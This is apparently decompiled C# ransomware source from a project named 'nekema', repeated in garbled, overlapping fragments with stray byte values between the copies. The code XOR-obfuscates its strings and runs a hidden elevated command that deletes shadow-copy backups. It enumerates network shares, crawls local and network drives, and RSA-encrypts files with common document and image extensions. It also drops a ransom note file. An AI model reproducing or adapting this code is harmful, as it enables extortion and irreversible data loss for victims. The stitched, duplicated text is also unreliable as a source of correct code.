byte[] { 0xbf, 0xe1, 0xe1, 0xe5, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xf2, 0xf2, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe3, 0xe5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xe5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xe2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xe3, 0xa3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xff, 0xf4, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xff, 0xe3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xe3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xe3, 230 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe2, 0xe3, 0xa3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe2, 0xe3, 0xf7 }, this.X)); /* * : .cd.ldf .mdf .max .dbf .epf .1cd .md .db .pdf .ppt .xls .doc .arj .tar .7z .rar .zip .tif .jpg .ai .bmp .png .cdr .psd .jpeg .docx .xlsx .pptx .accdb .mdb .rtf .odt .ods .odb .odg .cr2 .nef .nrf .orf .arw .sr2 .srf */ // List<string> list = new List<string>(); Process process = new Process { StartInfo = { FileName = "cmd", Arguments = "/C net view", RedirectStandardOutput = true, UseShellExecute = false, CreateNoWindow = true } }; try { bool flag4; process.Start(); string str4 = process.StandardOutput.ReadToEnd(); int startIndex = 0; int index = 0; goto Label_0A8B; Label_0A48: startIndex = str4.IndexOf('\\', startIndex); if (startIndex == -1) { goto Label_0A98; } index = str4.IndexOf(' ', startIndex); list.Add(str4.Substring(startIndex, index - startIndex)); startIndex = index; Label_0A8B: flag4 = true; goto Label_0A48; } catch { } Label_0A98: num5 = 0; while (num5 < list.Count) { Process process2 = new Process { StartInfo = { FileName = "cmd", Arguments = "/C net view " + list[num5], RedirectStandardOutput = true, UseShellExecute = false, CreateNoWindow = true } }; try { process2.Start(); string s = process2.StandardOutput.ReadToEnd(); byte[] bytes = Encoding.GetEncoding(0x4e3).GetBytes(s); char[] separator = new char[] { '\r', '\n' }; string[] strArray = Encoding.GetEncoding("CP866").GetString(bytes).Split(separator); for (int j = 0; j < strArray.Length; j++) { if (strArray[j].IndexOf("") > -1) { this.FullList.Add(list[num5] + @"\" + strArray[j].Substring(0, strArray[j].IndexOf(""))); } } } catch { } num5++; } /// ...RSA 2048 RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); this.publicKey = provider.ToXmlString(false); // XML this.privateKey = this.CryptKey(provider.ToXmlString(true)); // ... } ///// ssda.far private void SaveKey(string f, string k) { string str = this.keyfile.Substring(0, this.keyfile.Length - 4); if (!File.Exists(f + @"\" + this.keyfile)) { try { File.WriteAllText(f + @"\" + this.keyfile, k); } catch { } } else { try { File.WriteAllText(string.Concat(new object[] { f, @"\", str, this.AmountFiles(f), ".", this.kfExt }), k); } catch { } } } ///// private void SaveNotes() { List<string> list = new List<string> { // Environment.GetFolderPath(Environment.SpecialFolder.DesktopDirectory), // Environment.GetFolderPath(Environment.SpecialFolder.Personal) // }; for (int i = 0; i < list.Count; i++) // { this.SaveKey(list[i], this.privateKey); // ssda.far this.AddNote(list[i]); // } } ///// private void GetDirs(DirectoryInfo pth) { try { DirectoryInfo[] directories = pth.GetDirectories(); foreach (DirectoryInfo info in directories) { this.GetFiles(info); this.GetDirs(info); } } catch { } } ///// private void GetDrives() { try { string[] logicalDrives = Environment.GetLogicalDrives(); for (int i = 0; i < logicalDrives.Length; i++) { DriveInfo info = new DriveInfo(logicalDrives[i]); if ((info.DriveType == DriveType.Fixed) || (info.DriveType == DriveType.Network)) { this.GetDirs(info.RootDirectory); } } } catch { } } //// ... private void GetFiles(DirectoryInfo folder) { try { string[] files = Directory.GetFiles(folder.FullName, "*.*"); foreach (string str in files) { foreach (string str2 in this.extensions) // { if ((str.ToLower().IndexOf(str2) > -1) && (str.ToLower().IndexOf(str2 + ".") == -1)) { string str3 = str; if (str.IndexOf(this.vNF) == -1) { this.CF(str3); /// ... } } } } } catch { } } } } , 0xc6,190, 0xc3, namespace nekema { public class Form1 : Form { private int blocksize = 0xf5; //245 . private IContainer components = null; private List<string> extensions = new List<string>(); // private List<string> FullList = new List<string>(); // private string keyCode; // . . private string keyfile = ""; // "ssda.far" private string kfExt = ""; // "far" private string kfName = ""; // "ssda" private static readonly int MAX_PATH = 260; // private string pbK = ""; // . private string privateKey = ""; // private string publicKey = ""; // . private int repeatCount = 3; // private List<string> SpecFolders = new List<string>(); private string vNF = ""; // HOW--TO--RETURN--YOUR--FILES.jpg private byte X = 0x91; // // DEXOR = 145 ////// HOW--TO--RETURN--YOUR--FILES.jpg private void AddNote(string f) { string currentDirectory = Environment.CurrentDirectory; if (f != currentDirectory) { try { if (!File.Exists(f + @"\" + this.vNF)) { Resources.ne5.Save(f + @"\" + this.vNF); } } catch { } } } //////// - private void CF(string f1) { byte[] destinationArray = new byte[this.blocksize]; try { byte[] sourceArray = File.ReadAllBytes(f1); if ((sourceArray.Length / (this.repeatCount + 5)) >= this.blocksize) { RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); provider.FromXmlString(this.publicKey); byte[] buffer3 = new byte[sourceArray.Length + (this.repeatCount * 11)]; byte[] buffer4 = new byte[sourceArray.Length - (this.repeatCount * this.blocksize)]; for (int i = 0; i < this.repeatCount; i++) { Array.Copy(sourceArray, this.blocksize * i, destinationArray, 0, this.blocksize); byte[] buffer5 = provider.Encrypt(destinationArray, false); Array.Copy(buffer5, 0, buffer3, i * (this.blocksize + 11), buffer5.Length); } Array.Copy(sourceArray, this.repeatCount * this.blocksize, buffer4, 0, buffer4.Length); Array.Copy(buffer4, 0, buffer3, this.repeatCount * (this.blocksize + 11), buffer4.Length); try { File.WriteAllBytes(f1, buffer3); File.Move(f1, f1 + this.keyCode); } catch { } } } catch { } } ////// - private string CryptKey(string s) { string str = ""; byte[] array = new byte[s.Length]; byte[] destinationArray = new byte[this.blocksize]; byte[] bytes = new byte[this.blocksize + 11]; double num = Math.Ceiling((double) (((double) s.Length) / ((double) this.blocksize))); if (s.Length < (num * this.blocksize)) { int length = s.Length; for (int i = 0; i < ((num * this.blocksize) - length); i++) { s = s + " "; } } array = Encoding.Default.GetBytes(s); Array.Reverse(array); try { RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); provider.FromXmlString(this.pbK); for (int j = 0; j < num; j++) { Array.Copy(array, j * this.blocksize, destinationArray, 0, this.blocksize); bytes = provider.Encrypt(destinationArray, false); str = str + Encoding.Default.GetString(bytes); } } catch { } return str; } ///// private void DelS() { byte[] a = new byte[] { 0xe7, 0xe2, 0xe2, 240, 0xf5, 0xfc, 0xf8, 0xff, 0xbf, 0xf4, 0xe9, 0xf4 }; byte[] buffer2 = new byte[] { 0xd5, 0xf4, 0xfd, 0xf4, 0xe5, 0xf4, 0xb1, 0xc2, 0xf9, 240, 0xf5, 0xfe, 230, 0xe2, 0xb1, 190, 0xd0, 0xfd, 0xfd, 0xb1, 190, 0xc0, 0xe4, 0xf8, 0xf4, 0xe5 }; Process process = new Process { StartInfo = { FileName = this.DeXOR(a, this.X), Arguments = this.DeXOR(buffer2, this.X), WindowStyle = ProcessWindowStyle.Hidden, CreateNoWindow = true, UseShellExecute = true, Verb = "runas" } }; try { process.Start(); } catch { } } ///// XOR private string DeXOR(byte[] A, int x) { string str = ""; byte[] bytes = new byte[A.Length]; for (int i = 0; i < A.Length; i++) { bytes[i] = (byte) (A[i] ^ x); } return (str = Encoding.Default.GetString(bytes)); } ///// . private void Init() { this.Prep(); // this.SaveNotes(); // this.GetDrives(); // this.NetScan(); // this.SetDesktopWallpaper(); // , } private void Prep() { int num5; // a = ssda.far byte[] a = new byte[] { 0xe2, 0xe2, 0xf5, 240, 0xbf, 0xf7, 240, 0xe3 }; //buffer2 = HOW--TO--RETURN--YOUR--FILES.jpg byte[] buffer2 = new byte[] {0xd9, 0xde, 0xc6, 0xbc, 0xbc, 0xc5, 0xde, 0xbc, 0xbc, 0xc3, 0xd4, 0xc5, 0xc4, 0xc3, 0xdf, 0xbc, 0xbc, 200, 0xde, 0xc4, 0xc3, 0xbc, 0xbc, 0xd7, 0xd8, 0xdd, 0xd4, 0xc2, 0xbf, 0xfb, 0xe1, 0xf6}; //buffer3 = <RSAKeyValue <Modulus>+fFYiO9CH9iZwwzlsQ3X+qZ7Uyx290OhZ1WvLt6cmDd5oRsLoHLnoGws1CWFMOGFjtbaROSkTg3W+72/TjzHkuPp2W/RC7FBC4JpgguCi4x4ye4HEwRkQ75tHhig08hRKm1a7wlwYl8zLAzM8AwTPLh770MOzPqF1fJMKZCAtdUgIKdYNAkrP18sRbshkGNjwjMhMLNbKTaYfo3qIS4vtVUQtcw+g9ys3ZFZetKEl0ZMJEp4X7b4HK9vqUohPBYfBszXY6ion5m5tSSfhJK6OX2HPaU6RDcajTeEcmk9it9x73drJleZ1G+tVgL6duLX/uOWPVyi0rhyvYmRrGNcIQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue> byte[] buffer3 = new byte[] { 0xad, 0xc3, 0xc2, 0xd0, 0xda, 0xf4, 0xe8, 0xc7, 240, 0xfd, 0xe4, 0xf4, 0xaf, 0xad, 220, 0xfe, 0xf5, 0xe4, 0xfd, 0xe4, 0xe2, 0xaf, 0xba, 0xf7, 0xd7, 200, 0xf8, 0xde, 0xa8, 210, 0xd9, 0xa8, 0xf8, 0xcb, 230, 230, 0xeb, 0xfd, 0xe2, 0xc0, 0xa2, 0xc9, 0xba, 0xe0, 0xcb, 0xa6, 0xc4, 0xe8, 0xe9, 0xa3, 0xa8, 0xa1, 0xde, 0xf9, 0xcb, 160, 0xc6, 0xe7, 0xdd, 0xe5, 0xa7, 0xf2, 0xfc, 0xd5,0xf5, 0xa4, 0xfe, 0xc3, 0xe2, 0xdd, 0xfe, 0xd9, 0xdd, 0xff, 0xfe, 0xd6, 230, 0xe2, 160, 210,0xc6, 0xd7, 220, 0xde, 0xd6, 0xd7, 0xfb, 0xe5, 0xf3, 240, 0xc3, 0xde, 0xc2, 250, 0xc5, 0xf6, 0xa2, 0xc6, 0xba, 0xa6, 0xa3, 190, 0xc5, 0xfb, 0xeb, 0xd9, 250, 0xe4, 0xc1, 0xe1, 0xa3, 0xc6,190, 0xc3, 210, 0xa6, 0xd7, 0xd3, 210, 0xa5, 0xdb, 0xe1, 0xf6, 0xf6, 0xe4, 210, 0xf8, 0xa5, 0xe9, 0xa5, 0xe8, 0xf4, 0xa5, 0xd9, 0xd4, 230, 0xc3, 250, 0xc0, 0xa6, 0xa4, 0xe5, 0xd9, 0xf9, 0xf8, 0xf6, 0xa1, 0xa9, 0xf9, 0xc3, 0xda, 0xfc, 160, 240, 0xa6, 230, 0xfd, 230, 200, 0xfd, 0xa9, 0xeb, 0xdd, 0xd0, 0xeb, 220, 0xa9, 0xd0, 230, 0xc5, 0xc1, 0xdd, 0xf9, 0xa6, 0xa6, 0xa1, 220, 0xde, 0xeb, 0xc1, 0xe0, 0xd7, 160, 0xf7, 0xdb, 220, 0xda, 0xcb, 210, 0xd0, 0xe5, 0xf5, 0xc4, 0xf6, 0xd8, 0xda, 0xf5, 200, 0xdf, 0xd0, 250, 0xe3, 0xc1, 160, 0xa9, 0xe2, 0xc3, 0xf3, 0xe2, 0xf9, 250, 0xd6, 0xdf, 0xfb, 230, 0xfb, 220, 0xf9, 220, 0xdd, 0xdf, 0xf3, 0xda, 0xc5, 240, 200, 0xf7, 0xfe, 0xa2, 0xe0, 0xd8, 0xc2, 0xa5, 0xe7, 0xe5, 0xc7, 0xc4, 0xc0, 0xe5, 0xf2, 230, 0xba, 0xf6, 0xa8, 0xe8, 0xe2, 0xa2, 0xcb, 0xd7, 0xcb, 0xf4, 0xe5, 0xda, 0xd4, 0xfd, 0xa1, 0xcb, 220, 0xdb, 0xd4, 0xe1, 0xa5, 0xc9, 0xa6, 0xf3, 0xa5, 0xd9, 0xda, 0xa8, 0xe7, 0xe0, 0xc4, 0xfe, 0xf9, 0xc1, 0xd3, 200, 0xf7, 0xd3, 0xe2, 0xeb, 0xc9, 200, 0xa7, 0xf8, 0xfe, 0xff, 0xa4, 0xfc, 0xa4, 0xe5, 0xc2, 0xc2, 0xf7, 0xf9, 0xdb, 0xda, 0xa7, 0xde, 0xc9, 0xa3, 0xd9, 0xc1, 240, 0xc4, 0xa7, 0xc3, 0xd5, 0xf2, 240, 0xfb, 0xc5, 0xf4, 0xd4, 0xf2, 0xfc, 250, 0xa8, 0xf8, 0xe5, 0xa8, 0xe9, 0xa6, 0xa2, 0xf5, 0xe3, 0xdb, 0xfd, 0xf4, 0xcb, 160, 0xd6, 0xba, 0xe5, 0xc7, 0xf6, 0xdd, 0xa7, 0xf5, 0xe4, 0xdd, 0xc9, 190, 0xe4, 0xde, 0xc6, 0xc1, 0xc7, 0xe8, 0xf8, 0xa1, 0xe3, 0xf9, 0xe8, 0xe7, 200, 0xfc, 0xc3, 0xe3, 0xd6, 0xdf, 0xf2, 0xd8, 0xc0, 0xac, 0xac, 0xad, 190, 220, 0xfe, 0xf5, 0xe4, 0xfd, 0xe4, 0xe2, 0xaf, 0xad, 0xd4, 0xe9, 0xe1, 0xfe, 0xff, 0xf4, 0xff, 0xe5, 0xaf, 0xd0, 0xc0, 0xd0, 0xd3, 0xad, 190, 0xd4, 0xe9, 0xe1, 0xfe, 0xff, 0xf4, 0xff, 0xe5, 0xaf, 0xad, 190, 0xc3, 0xc2, 0xd0, 0xda, 0xf4, 0xe8, 0xc7, 240, 0xfd, 0xe4, 0xf4, 0xaf}; // Windows Vista - . if (Environment.OSVersion.Version.Major > 5) { new Thread(new ThreadStart(this.DelS)).Start(); } // ... this.pbK = this.DeXOR(buffer3, this.X); string str = this.DeXOR(buffer2, this.X); this.vNF = this.DeXOR(buffer2, this.X); this.keyfile = this.DeXOR(a, this.X); this.kfExt = this.RetFExt(this.keyfile); this.kfName = this.RetFName(this.keyfile); this.keyCode = "."; // Random random = new Random(); random.Next(0x61, 0x7a); for (int i = 0; i < 1; i++) { this.keyCode = this.keyCode + Convert.ToChar(random.Next(0x61, 0x7a)).ToString(); } string[] textArray1 = new string[] { this.keyCode, (DateTime.Now.Day + 10).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), (DateTime.Now.Month + 10).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString() }; this.keyCode = string.Concat(textArray1); // ... // ... string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.System); folderPath = folderPath.Substring(0, folderPath.ToLower().IndexOf(@"\system")); string str3 = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles); this.SpecFolders.Add(folderPath.ToLower()); this.SpecFolders.Add(str3.ToLower()); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xc3, 0xd4, 210, 200, 210, 0xdd, 0xd4, 0xc3 }, this.X)); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xb5, 0xc3, 0xd4, 210, 200, 210, 0xdd, 0xd4, 0xbf, 0xd3, 0xd8, 0xdf }, this.X)); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xc2, 0xe8, 0xe2, 0xe5, 0xf4, 0xfc, 0xb1, 0xc7, 0xfe, 0xfd, 0xe4, 0xfc, 0xf4, 0xb1, 0xd8, 0xff, 0xf7, 0xfe, 0xe3, 0xfc, 240, 0xe5, 0xf8, 0xfe, 0xff }, this.X)); /* ... c:\windows c:\program files (x86) RECYCLER $RECYCLE.BIN System Volume Information */ /// this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfd, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 240, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xf3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf4, 0xe1, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 160, 0xf2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe1, 0xe5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe9, 0xfd, 0xe2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xfe, 0xf2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xe3, 0xfb }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe5, 240, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xa6, 0xeb }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe3, 240, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xeb, 0xf8, 0xe1 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe5, 0xf8, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfb, 0xe1, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xf8 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf3, 0xfc, 0xe1 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xff, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xf5, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfb, 0xe1, 0xf4, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xfe, 0xf2, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe9, 0xfd, 0xe2, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe1, 0xe5, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xf2, 0xf2, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe3, 0xe5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xe5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xe2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xe3, 0xa3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xff, 0xf4, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xff, 0xe3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xe3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xe3, 230 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe2, 0xe3, 0xa3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe2, 0xe3, 0xf7 }, this.X)); /* * : .cd.ldf .mdf .max .dbf .epf .1cd .md .db .pdf .ppt .xls .doc .arj .tar .7z .rar .zip .tif .jpg .ai .bmp .png .cdr .psd .jpeg .docx .xlsx .pptx .accdb .mdb .rtf .odt .ods .odb .odg .cr2 .nef .nrf .orf .arw .sr2 .srf */ // List<string> list = new List<string>(); Process process = new Process { StartInfo = { FileName = "cmd", Arguments = "/C net view", RedirectStandardOutput = true, UseShellExecute = false, CreateNoWindow = true } }; try { bool flag4; process.Start(); string str4 = process.StandardOutput.ReadToEnd(); int startIndex = 0; int index = 0; goto Label_0A8B; Label_0A48: startIndex = str4.IndexOf('\\', startIndex); if (startIndex == -1) { goto Label_0A98; } index = str4.IndexOf(' ', startIndex); list.Add(str4.Substring(startIndex, index - startIndex)); startIndex = index; Label_0A8B: flag4 = true; goto Label_0A48; } catch { } Label_0A98: num5 = 0; while (num5 < list.Count) { Process process2 = new Process { StartInfo = { FileName = "cmd", Arguments = "/C net view " + list[num5], RedirectStandardOutput = true, UseShellExecute = false, CreateNoWindow = true } }; try { process2.Start(); string s = process2.StandardOutput.ReadToEnd(); byte[] bytes = Encoding.GetEncoding(0x4e3).GetBytes(s); char[] separator = new char[] { '\r', '\n' }; string[] strArray = Encoding.GetEncoding("CP866").GetString(bytes).Split(separator); for (int j = 0; j < strArray.Length; j++) { if (strArray[j].IndexOf("") > -1) { this.FullList.Add(list[num5] + @"\" + strArray[j].Substring(0, strArray[j].IndexOf(""))); } } } catch { } num5++; } /// ...RSA 2048 RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); this.publicKey = provider.ToXmlString(false); // XML this.privateKey = this.CryptKey(provider.ToXmlString(true)); // ... } ///// ssda.far private void SaveKey(string f, string k) { string str = this.keyfile.Substring(0, this.keyfile.Length - 4); if (!File.Exists(f + @"\" + this.keyfile)) { try { File.WriteAllText(f + @"\" + this.keyfile, k); } catch { } } else { try { File.WriteAllText(string.Concat(new object[] { f, @"\", str, this.AmountFiles(f), ".", this.kfExt }), k); } catch { } } } ///// private void SaveNotes() { List<string> list = new List<string> { // Environment.GetFolderPath(Environment.SpecialFolder.DesktopDirectory), // Environment.GetFolderPath(Environment.SpecialFolder.Personal) // }; for (int i = 0; i < list.Count; i++) // { this.SaveKey(list[i], this.privateKey); // ssda.far this.AddNote(list[i]); // } } ///// private void GetDirs(DirectoryInfo pth) { try { DirectoryInfo[] directories = pth.GetDirectories(); foreach (DirectoryInfo info in directories) { this.GetFiles(info); this.GetDirs(info); } } catch { } } ///// private void GetDrives() { try { string[] logicalDrives = Environment.GetLogicalDrives(); for (int i = 0; i < logicalDrives.Length; i++) { DriveInfo info = new DriveInfo(logicalDrives[i]); if ((info.DriveType == DriveType.Fixed) || (info.DriveType == DriveType.Network)) { this.GetDirs(info.RootDirectory); } } } catch { } } //// ... private void GetFiles(DirectoryInfo folder) { try { string[] files = Directory.GetFiles(folder.FullName, "*.*"); foreach (string str in files) { foreach (string str2 in this.extensions) // { if ((str.ToLower().IndexOf(str2) > -1) && (str.ToLower().IndexOf(str2 + ".") == -1)) { string str3 = str; if (str.IndexOf(this.vNF) == -1) { this.CF(str3); /// ... } } } } } catch { } } } } , 0xa6, 0xa6, 0xa1, namespace nekema { public class Form1 : Form { private int blocksize = 0xf5; //245 . private IContainer components = null; private List<string> extensions = new List<string>(); // private List<string> FullList = new List<string>(); // private string keyCode; // . . private string keyfile = ""; // "ssda.far" private string kfExt = ""; // "far" private string kfName = ""; // "ssda" private static readonly int MAX_PATH = 260; // private string pbK = ""; // . private string privateKey = ""; // private string publicKey = ""; // . private int repeatCount = 3; // private List<string> SpecFolders = new List<string>(); private string vNF = ""; // HOW--TO--RETURN--YOUR--FILES.jpg private byte X = 0x91; // // DEXOR = 145 ////// HOW--TO--RETURN--YOUR--FILES.jpg private void AddNote(string f) { string currentDirectory = Environment.CurrentDirectory; if (f != currentDirectory) { try { if (!File.Exists(f + @"\" + this.vNF)) { Resources.ne5.Save(f + @"\" + this.vNF); } } catch { } } } //////// - private void CF(string f1) { byte[] destinationArray = new byte[this.blocksize]; try { byte[] sourceArray = File.ReadAllBytes(f1); if ((sourceArray.Length / (this.repeatCount + 5)) >= this.blocksize) { RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); provider.FromXmlString(this.publicKey); byte[] buffer3 = new byte[sourceArray.Length + (this.repeatCount * 11)]; byte[] buffer4 = new byte[sourceArray.Length - (this.repeatCount * this.blocksize)]; for (int i = 0; i < this.repeatCount; i++) { Array.Copy(sourceArray, this.blocksize * i, destinationArray, 0, this.blocksize); byte[] buffer5 = provider.Encrypt(destinationArray, false); Array.Copy(buffer5, 0, buffer3, i * (this.blocksize + 11), buffer5.Length); } Array.Copy(sourceArray, this.repeatCount * this.blocksize, buffer4, 0, buffer4.Length); Array.Copy(buffer4, 0, buffer3, this.repeatCount * (this.blocksize + 11), buffer4.Length); try { File.WriteAllBytes(f1, buffer3); File.Move(f1, f1 + this.keyCode); } catch { } } } catch { } } ////// - private string CryptKey(string s) { string str = ""; byte[] array = new byte[s.Length]; byte[] destinationArray = new byte[this.blocksize]; byte[] bytes = new byte[this.blocksize + 11]; double num = Math.Ceiling((double) (((double) s.Length) / ((double) this.blocksize))); if (s.Length < (num * this.blocksize)) { int length = s.Length; for (int i = 0; i < ((num * this.blocksize) - length); i++) { s = s + " "; } } array = Encoding.Default.GetBytes(s); Array.Reverse(array); try { RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); provider.FromXmlString(this.pbK); for (int j = 0; j < num; j++) { Array.Copy(array, j * this.blocksize, destinationArray, 0, this.blocksize); bytes = provider.Encrypt(destinationArray, false); str = str + Encoding.Default.GetString(bytes); } } catch { } return str; } ///// private void DelS() { byte[] a = new byte[] { 0xe7, 0xe2, 0xe2, 240, 0xf5, 0xfc, 0xf8, 0xff, 0xbf, 0xf4, 0xe9, 0xf4 }; byte[] buffer2 = new byte[] { 0xd5, 0xf4, 0xfd, 0xf4, 0xe5, 0xf4, 0xb1, 0xc2, 0xf9, 240, 0xf5, 0xfe, 230, 0xe2, 0xb1, 190, 0xd0, 0xfd, 0xfd, 0xb1, 190, 0xc0, 0xe4, 0xf8, 0xf4, 0xe5 }; Process process = new Process { StartInfo = { FileName = this.DeXOR(a, this.X), Arguments = this.DeXOR(buffer2, this.X), WindowStyle = ProcessWindowStyle.Hidden, CreateNoWindow = true, UseShellExecute = true, Verb = "runas" } }; try { process.Start(); } catch { } } ///// XOR private string DeXOR(byte[] A, int x) { string str = ""; byte[] bytes = new byte[A.Length]; for (int i = 0; i < A.Length; i++) { bytes[i] = (byte) (A[i] ^ x); } return (str = Encoding.Default.GetString(bytes)); } ///// . private void Init() { this.Prep(); // this.SaveNotes(); // this.GetDrives(); // this.NetScan(); // this.SetDesktopWallpaper(); // , } private void Prep() { int num5; // a = ssda.far byte[] a = new byte[] { 0xe2, 0xe2, 0xf5, 240, 0xbf, 0xf7, 240, 0xe3 }; //buffer2 = HOW--TO--RETURN--YOUR--FILES.jpg byte[] buffer2 = new byte[] {0xd9, 0xde, 0xc6, 0xbc, 0xbc, 0xc5, 0xde, 0xbc, 0xbc, 0xc3, 0xd4, 0xc5, 0xc4, 0xc3, 0xdf, 0xbc, 0xbc, 200, 0xde, 0xc4, 0xc3, 0xbc, 0xbc, 0xd7, 0xd8, 0xdd, 0xd4, 0xc2, 0xbf, 0xfb, 0xe1, 0xf6}; //buffer3 = <RSAKeyValue <Modulus>+fFYiO9CH9iZwwzlsQ3X+qZ7Uyx290OhZ1WvLt6cmDd5oRsLoHLnoGws1CWFMOGFjtbaROSkTg3W+72/TjzHkuPp2W/RC7FBC4JpgguCi4x4ye4HEwRkQ75tHhig08hRKm1a7wlwYl8zLAzM8AwTPLh770MOzPqF1fJMKZCAtdUgIKdYNAkrP18sRbshkGNjwjMhMLNbKTaYfo3qIS4vtVUQtcw+g9ys3ZFZetKEl0ZMJEp4X7b4HK9vqUohPBYfBszXY6ion5m5tSSfhJK6OX2HPaU6RDcajTeEcmk9it9x73drJleZ1G+tVgL6duLX/uOWPVyi0rhyvYmRrGNcIQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue> byte[] buffer3 = new byte[] { 0xad, 0xc3, 0xc2, 0xd0, 0xda, 0xf4, 0xe8, 0xc7, 240, 0xfd, 0xe4, 0xf4, 0xaf, 0xad, 220, 0xfe, 0xf5, 0xe4, 0xfd, 0xe4, 0xe2, 0xaf, 0xba, 0xf7, 0xd7, 200, 0xf8, 0xde, 0xa8, 210, 0xd9, 0xa8, 0xf8, 0xcb, 230, 230, 0xeb, 0xfd, 0xe2, 0xc0, 0xa2, 0xc9, 0xba, 0xe0, 0xcb, 0xa6, 0xc4, 